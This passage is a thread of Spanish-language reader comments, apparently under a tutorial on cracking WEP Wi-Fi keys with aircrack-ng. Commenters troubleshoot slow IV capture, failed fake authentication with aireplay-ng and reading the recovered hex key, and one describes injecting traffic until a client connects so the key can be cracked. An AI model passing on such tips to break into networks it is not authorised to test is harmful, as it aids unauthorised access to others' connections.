  74. jalo 4:56 PM
    Hola,

    En primer lugar felicitarte por este magnífico tutorial.

    He seguido todos los pasos y bueno, todo parece funcionar correctamente. Pero hay un detalle: La columna de los IV's capturados (#Data, no?) sube extremadamente lenta.

    He leído que la causa pueda ser la lejanía del AP/router.. pero en mi caso es que el router está justo debajo del portátil con la tarjeta. A apenas 30 centímetros.

    ¿Sabes a que se puede deber y alguna solución?

    Gracias, un saludo.
  75. oscar 8:32 AM
    enhorabuena por el manual es muy bueno! perdona que sea un poco novato. tengo un problema y es que sigo tus pasos y funciona bien pero los arp no me suben y los data me suben hasta 23 pero ya no mas. no puede ser por la señal porque estoy al lado del modem. puedes ayudarme a solucionarlo?
  76. hola, me podrias ayudar, he puesto el numero Hexadecimal que me proporciona, lo convierto en la pagina que das pero me salen unos numeros raros, como le puedo hacer????. y muy buen tutorial. Me urge por q a mi jefe se le perdio los numeros del modem que por quitarlo le salio muy caro. Gracias
  77. De lujo colegas 6:11 PM
    pon todos los numeros que hay a partir de los 2 puntos (:) es decir 345656C3OE

    y suerte, a mi me han salido 26 numeros...que supongo que sera la clave de 13 letras que tengo...

    Muchas gracias y enhorabuena por el tuto!!!
  78. Anónimo 10:19 AM
    Hola gracias por la tuto, me gustaria saber si se podria hacer algo con las k sean wap, pork al realizar los pasos en el de asociarnos al access point me da un error por k es clave wap, si sabes algo podrias explicarlo gracias por todo, y sobre todo excelente tutorial :)
  79. Anónimo 2:18 PM
    Saludos a todos, yo tambien tengo el problema que me no me aparece la carpeta wifi0 y no se como le puedo hacer para que me funcione, gracias por el tutorial y saludos
  80. Anónimo 9:44 AM
    Hola. espero me puedan ayudar, uso backtrack 3 y hago los mismo pasos que me indica el tutorial, pero me da problemas a la hora de asociarme al ap con el aireplany-ng. Lo que me dice es "sending authentication request"y me lo dice varias veces hasta que corta y devuelve los posibles errores. El tema es que una vez logre asociarme al ap pero no pude obtener la wep porque no habia nadie navegando y no obtuve IV. pero otro dia que si navegaban(capturaba IV pero muy lento)quise asociarme y no pude. Por favor ayudenme!!!
  81. Anónimo 7:33 AM
    Yo soy el anonimo del ultimo mensaje. Solo escribo para decir que soluciones el problema y, nobleza obliga, vuelvo para reportarlo y que a nadie le vuelva a pasar. El problema es que para autenticarse hace falta que no haya nigun cliente conectado a la lan. En el siguiente link lo pueden ver: http://aircrack-ng.org/doku.php?id=falsa_autenticacion. Una vez que se hayan auteticado comienzan la inyeccion de trafico, y lo dejan un rato, en cuanto algun ususario de la lan se conecte los paquetes empieza a subir y Bingo!!!ya pueden crackear la wep con el aircrack
  82. david 3:37 PM
    no encuentro el archivo channel del primer paso, a que se debe??, tengo una del inspiron, gracias, que alguien me respondaa
  83. Mesmer 3:50 PM
    Gracias, gracias maestro, ya seguí el tutorial y se me funcionó, sin duda este es el mejor tutorial que he visto. Y para aKO, quiero decirle que yo tenia el mismo problema, lo que debes de hacer es introducir la clave despues de los dos puntos, sólo que sin espacios. Espero te sirva mi consejo.
  84. Anónimo 7:30 AM
    Muchas gracias!!!! Me funciono a la perfeccion todo el tutorial es muy claro

Something to say?